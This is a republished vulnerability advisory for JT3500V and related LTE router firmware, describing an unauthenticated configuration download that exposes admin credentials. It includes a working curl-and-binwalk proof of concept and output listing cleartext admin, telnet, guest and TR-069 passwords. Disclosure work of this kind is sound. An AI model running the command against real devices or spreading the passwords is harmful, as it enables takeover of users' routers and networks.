KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authentication Bypass

2021.03.21
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authentication Bypass Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker can disclose sensitive and clear-text information resulting in authentication bypass by downloading the configuration of the device and revealing the admin password. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5636 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php 03.02.2021 -- $ curl -s \ -o configtest.zlib \ # Default: config.dat 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \ binwalk -e configtest.zlib ; \ cd _configtest.zlib_extracted ; \ strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \ # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device cd .. 3:Login=admin 4:Password=neotelwings 5:TelnetPwd=root123 6:GuestId=user 7:GuestPassword=user123 89:DDNSPassword= 239:auto_update_password= 279:Tr069_Password= 288:Tr069_ConnectionRequestPassword=admin 300:Tr069_STUNPassword= 339:telnetManagement=2 $


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top